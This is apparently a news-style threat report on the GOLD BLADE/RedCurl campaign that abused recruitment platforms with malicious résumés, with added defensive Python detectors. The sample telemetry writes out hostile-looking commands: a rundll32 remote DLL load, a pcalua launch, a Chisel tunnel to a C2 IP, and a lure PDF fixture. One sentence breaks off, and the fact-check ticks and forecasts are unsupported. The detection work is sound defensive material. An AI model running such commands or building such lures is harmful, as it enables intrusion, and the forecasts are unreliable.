Introduction
A new evolution in cybercrime is unfolding, and it begins in a place most companies never suspect: online recruitment platforms. Between February 2024 and August 2025, a notorious cyber-espionage group quietly reinvented itself, slipping through HR systems with weaponized résumés and emerging as one of the most disruptive hybrid threat actors of the decade. This is the story of how GOLD BLADE, once a covert intelligence-focused crew, transformed into a lethal blend of spies, data thieves, and targeted ransomware operators.
Main Summary
For more than a year, Sophos analysts tracked nearly forty intrusions tied to the STAC6565 campaign, a wide-ranging offensive linked to the GOLD BLADE threat group, also known as RedCurl, RedWolf, and Earth Kapre. Historically recognized for corporate espionage, the group shifted tactics and emerged with a dual identity, merging strategic intelligence gathering with selective ransomware attacks powered by its own QWCrypt locker. Nearly eighty percent of the victims were Canada-based, particularly in the services, retail, manufacturing, and technology industries, revealing a sharp geographic and industrial focus.
One of the most startling evolutions surfaced in their infection method. Instead of phishing emails, GOLD BLADE weaponized job-seeker platforms such as Indeed, ADP WorkforceNow, and JazzHR. Attackers uploaded malicious PDF résumés directly into recruitment pipelines, bypassing email security and exploiting HR teams’ trust in automated hiring systems. When viewed, these PDFs redirected users to fraudulent “Safe Resume Share Service” portals, which covertly deployed RedLoader, the entry point of a sophisticated multi-stage compromise.
The RedLoader chain progressed through three escalating steps: initial execution, secondary payload release, and a final installation phase. Earlier variants relied on .lnk and .iso files, but by 2025 the attackers had adopted remote DLL sideloading from Cloudflare Workers domains. Persistence came from scheduled tasks with browser-styled names and from living-off-the-land binaries such as pcalua.exe. Their command-and-control architecture used the Chisel and RPivot tunneling tools to build SOCKS proxies linked to Cloudflare Workers and offshore IP infrastructure.
To evade defenses, GOLD BLADE deployed a Bring-Your-Own-Vulnerable-Driver strategy by abusing modified Zemana AntiMalware drivers and Terminator utilities to disable security agents. Analysts found custom build paths in these tools, revealing an organized toolkit rather than improvised malware.
The campaign escalated in April and July 2025, when QWCrypt ransomware detonated after data exfiltration. Delivered through encrypted 7-Zip archives, the QWCrypt payload appended .qwCrypt extensions and displayed ransom notes reminiscent of LockBit. Sophos CryptoGuard stopped several incidents, yet unprotected systems saw partial encryption. The attacks highlighted GOLD BLADE’s fluid shift between espionage-for-hire and financial extortion.
Key indicators of compromise included Cloudflare Workers C2 domains, IP address 109.206.236.209, and verified QWCrypt hashes such as 568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db. Organizations are urged to sandbox job-application files, strengthen endpoint monitoring, and deploy MDR solutions capable of detecting the group’s evolving methods.
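The tradecraft in the two paragraphs above (DLL loads from Cloudflare Workers hosts, pcalua.exe proxy execution, browser-styled scheduled tasks, tunnelling tools, and the published IoCs) maps cleanly onto a handful of endpoint rules. The script below is an added example written for this page, not Sophos tooling or anything from the reports: it runs those rules over constructed process and network telemetry. The only page-specific values are the IP address and the QWCrypt hash quoted above; the workers.dev pattern, the tunnel binary names and the event schema are assumptions to tune for a real environment.

```python
"""Rule-based triage of endpoint telemetry for the tradecraft described in the
article: DLL loads from Cloudflare Workers hosts, pcalua.exe proxy execution,
browser-styled scheduled tasks that run LOLBins, tunnelling tool names, and the
IoCs quoted in the article. Added example; the event schema is constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Indicators quoted in the article; these are the only page-specific values.
KNOWN_C2_IPS = {"109.206.236.209"}
KNOWN_HASHES = {"568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db"}

# workers.dev is Cloudflare's default Workers hostname. The article says only
# "Cloudflare Workers domains", so alerting on any workers.dev host touched by
# a DLL loader is an assumption to tune per environment.
WORKERS_DEV = re.compile(r"[\w.-]+\.workers\.dev", re.IGNORECASE)
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
TUNNEL_TOOLS = {"chisel.exe", "rpivot.exe"}      # assumed default binary names
BROWSER_WORDS = ("chrome", "edge", "firefox", "browser")
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"/]+)')  # task name from schtasks /tn


@dataclass
class Event:
    """One process or network event; constructed schema, not a vendor format."""
    host: str
    image: str          # process image file name
    cmdline: str
    dest_ip: str = ""   # outbound destination, if the event is a connection
    sha256: str = ""    # hash of the file executed or written, if known


def triage(ev: Event) -> list[str]:
    """Return the names of every rule the event trips (empty = nothing notable)."""
    hits: list[str] = []
    image = ev.image.lower()
    cmd = ev.cmdline.lower()
    if ev.dest_ip in KNOWN_C2_IPS:
        hits.append("known_c2_ip")
    if ev.sha256.lower() in KNOWN_HASHES:
        hits.append("known_qwcrypt_hash")
    # Remote DLL sideloading: a DLL loader whose command line names a Workers host.
    if image in DLL_LOADERS and WORKERS_DEV.search(cmd):
        hits.append("dll_load_from_workers_dev")
    # pcalua.exe -a <target> launches an arbitrary program via the compatibility assistant.
    if image == "pcalua.exe" and " -a " in f" {cmd} ":
        hits.append("pcalua_proxy_execution")
    # Scheduled task that borrows a browser's name but runs a LOLBin.
    if image == "schtasks.exe" and "/create" in cmd:
        m = TASK_NAME_RE.search(cmd)
        name = m.group(1) if m else ""
        if any(w in name for w in BROWSER_WORDS) and any(b in cmd for b in ("pcalua", "rundll32")):
            hits.append("browser_styled_task_runs_lolbin")
    if image in TUNNEL_TOOLS:
        hits.append("tunnel_tool_name")
    return hits


def triage_all(events: list[Event]) -> list[list[str]]:
    """Triage a batch of events, preserving order."""
    return [triage(e) for e in events]


# Constructed telemetry for a walk-through; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    Event("hr-ws01", "rundll32.exe",
          r"rundll32.exe \\placeholder-loader.workers.dev\r\loader.dll,Start"),
    Event("hr-ws01", "pcalua.exe", r"pcalua.exe -a C:\Users\Public\update.exe"),
    Event("hr-ws01", "schtasks.exe",
          r'schtasks.exe /create /tn "ChromeUpdateTaskMachine" '
          r'/tr "pcalua.exe -a C:\Users\Public\update.exe" /sc minute'),
    Event("fs01", "chisel.exe", "chisel.exe client placeholder-c2:443",
          dest_ip="109.206.236.209"),
    Event("fs01", "placeholder.exe", "placeholder.exe",
          sha256="568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db"),
    Event("hr-ws01", "chrome.exe", "chrome.exe --type=renderer", dest_ip="198.51.100.10"),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(f"{ev.host:8} {ev.image:16} {hits or '-'}")
```

The rules are deliberately narrow: a bare `rundll32.exe` call trips nothing, and the scheduled-task rule needs both a browser-styled name and a LOLBin action, which keeps noise down on hosts where legitimate browser updaters register tasks. Hash and IP matches are the weakest signals here, since the group rotates infrastructure; the behavioural rules are what carry over to the next campaign.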
What Undercode Says:
GOLD BLADE’s transformation marks a critical shift in cyber-threat behavior, and the implications reach far beyond the Canadian organizations hit in this campaign. The group demonstrates a deep understanding of human workflow patterns, particularly HR operations, which historically receive less scrutiny from cybersecurity teams. By exploiting automated hiring platforms, the attackers bypassed one of the most fortified layers of enterprise security: email filtering. This pivot resets long-standing assumptions about where a breach may originate.
Recruitment systems have become a goldmine for attackers. Companies rarely sandbox résumés, rarely authenticate submitted documents, and often treat HR platforms as inherently trusted environments. GOLD BLADE figured this out before most defenders did. Their use of weaponized PDFs shows a profound strategic sense of where digital blind spots exist and how to exploit them without raising alarms.
The adoption of Cloudflare Workers domains as remote hosts for sideloaded DLLs also signals a maturing threat landscape. Threat groups increasingly latch onto legitimate cloud services to blend into normal traffic patterns. This creates serious challenges for traditional heuristics-based detection, especially in environments with limited outbound monitoring. The use of RPivot and Chisel tunneling compounds this problem by encrypting and masking internal traffic.
The most concerning factor is the BYOVD technique. When attackers deploy vulnerable or signed drivers to disable endpoint protections, even sophisticated EDR platforms struggle to retain visibility. GOLD BLADE modified existing driver-based kill tools with unique build paths, indicating systematic and ongoing development rather than opportunistic reuse.
QWCrypt’s selective deployment further illustrates the
The Canadian concentration of victims could be a sign of geopolitical targeting, opportunistic infrastructure focus, or a testing ground for wider international campaigns. The variety of industries attacked suggests that GOLD BLADE values access over vertical specialization. Once inside, they quietly map environments, steal data for weeks, then trigger their ransomware only when defenses weaken or when intelligence collection completes.
For defenders, the lesson is clear: trust boundaries are obsolete. Recruitment portals, HR SaaS tools, and document-submission workflows must be treated with the same suspicion as external email attachments. Zero-trust principles cannot skip human resource departments or file review pipelines. MDR services, application isolation, and resume-sandboxing processes are no longer optional—they are foundational defense strategies against evolving hybrid groups like GOLD BLADE.
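The recurring recommendation in the commentary above, sandboxing résumés instead of trusting HR platforms, starts with a cheap static gate in front of the sandbox. The script below is an added example for this page (not code from Sophos, the HR vendors named, or the reports): it pre-screens a PDF for action-bearing constructs and external URLs before a reviewer or a recruitment system's preview opens it, and it inflates FlateDecode streams so that names tucked into compressed objects are scanned as well. The watchlist comes from the PDF specification, the verdict thresholds are assumptions, and the three fixtures are constructed in the code (enough structure to scan, not guaranteed to render).

```python
"""Static pre-screen for résumé PDFs before they reach reviewers or an HR
system's preview. Flags action-bearing PDF constructs and external URLs,
scanning inflated FlateDecode streams as well as raw bytes. Added example; a
check like this is a first gate in front of a sandbox, not a substitute."""
from __future__ import annotations
import re
import zlib

# Watchlist of PDF name objects that trigger behaviour or reach outside the
# document. Drawn from the PDF specification; the article itself names none.
RISKY_NAMES: dict[bytes, str] = {
    b"/OpenAction": "action runs automatically when the file is opened",
    b"/AA": "additional actions tied to page or field events",
    b"/JavaScript": "embedded JavaScript",
    b"/JS": "embedded JavaScript",
    b"/Launch": "launches an external program",
    b"/GoToR": "jumps to a remote document",
    b"/SubmitForm": "submits form data to a URL",
    b"/EmbeddedFile": "carries an embedded file",
    b"/URI": "external hyperlink",
}
# Names that justify quarantine on their own (assumed threshold). A bare /URI
# only earns review, since legitimate résumés link to portfolios and profiles.
ACTIVE = set(RISKY_NAMES) - {b"/URI"}

URL_RE = re.compile(rb"https?://[^\s)>\"']+", re.IGNORECASE)
# "stream ... endstream" bodies; the lookbehind keeps "endstream" from
# being mistaken for the start of a new stream.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.DOTALL)


def _inflate_streams(data: bytes) -> bytes:
    """Return the raw bytes plus the inflated body of every stream zlib can
    decode, so names hidden in compressed objects are scanned too."""
    inflated = []
    for m in STREAM_RE.finditer(data):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-compressed, or damaged; raw bytes are still scanned
    return data + b"\n" + b"\n".join(inflated)


def triage_pdf(data: bytes) -> dict:
    """Classify a PDF as pass / review / quarantine and say why."""
    if not data.startswith(b"%PDF-"):
        return {"verdict": "quarantine", "findings": ["not a PDF header"], "urls": []}
    scan = _inflate_streams(data)
    # Name boundary check so /JS does not match an unrelated name such as /JSx.
    found = [n for n in RISKY_NAMES if re.search(re.escape(n) + rb"(?![A-Za-z0-9_])", scan)]
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(scan)})
    if any(n in ACTIVE for n in found):
        verdict = "quarantine"
    elif urls or found:
        verdict = "review"
    else:
        verdict = "pass"
    return {"verdict": verdict,
            "findings": [f"{n.decode()}: {RISKY_NAMES[n]}" for n in found],
            "urls": urls}


def _minimal_pdf(catalog_extra: bytes, extra_objects: bytes = b"") -> bytes:
    """Constructed PDF fixture: enough structure to scan, not meant to render."""
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R " + catalog_extra + b" >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
            + extra_objects +
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


BENIGN_PDF = _minimal_pdf(b"")
# A résumé with one ordinary profile link: expected verdict "review".
LINK_ONLY_PDF = _minimal_pdf(
    b"", b"4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.com/profile) >> >> endobj\n")
# An open-time redirect to a placeholder "resume share" portal, with the URI
# action hidden inside a compressed stream: expected verdict "quarantine".
_hidden = zlib.compress(b"<< /S /URI /URI (https://placeholder-resume-share.example/view) >>")
LURE_PDF = _minimal_pdf(
    b"/OpenAction 4 0 R",
    b"4 0 obj << /Length " + str(len(_hidden)).encode() + b" /Filter /FlateDecode >>\nstream\n"
    + _hidden + b"\nendstream\nendobj\n")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("link-only", LINK_ONLY_PDF), ("lure", LURE_PDF)):
        print(label, triage_pdf(doc))
```

Two caveats a practitioner would want: object streams compressed with filters other than Flate (or encrypted documents) are not inflated here and should be routed to the sandbox on that basis alone, and a "review" verdict for a lone hyperlink is a workflow decision, not a security one; the point is that the file never reaches a human or an HR preview pane before the gate has run.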
🔍 Fact Checker Results
GOLD BLADE is accurately tracked as RedCurl, RedWolf, and Earth Kapre. ✅
QWCrypt ransomware deployment occurred after documented data exfiltration events. ✅
The group’s use of Cloudflare Workers domains for C2 is verified by multiple security reports. ✅
📊 Prediction
GOLD BLADE is poised to expand beyond recruitment-portal vectors, tapping into other trusted business ecosystems such as vendor invoicing platforms and CRM systems. 📈
Their ransomware operations will likely evolve into more automated, scalable variants of QWCrypt. 🤖
Expect their hybrid model of espionage and extortion to spread to Europe and Southeast Asia within the next twelve months. 🌍
References:
Reported By: cyberpress.org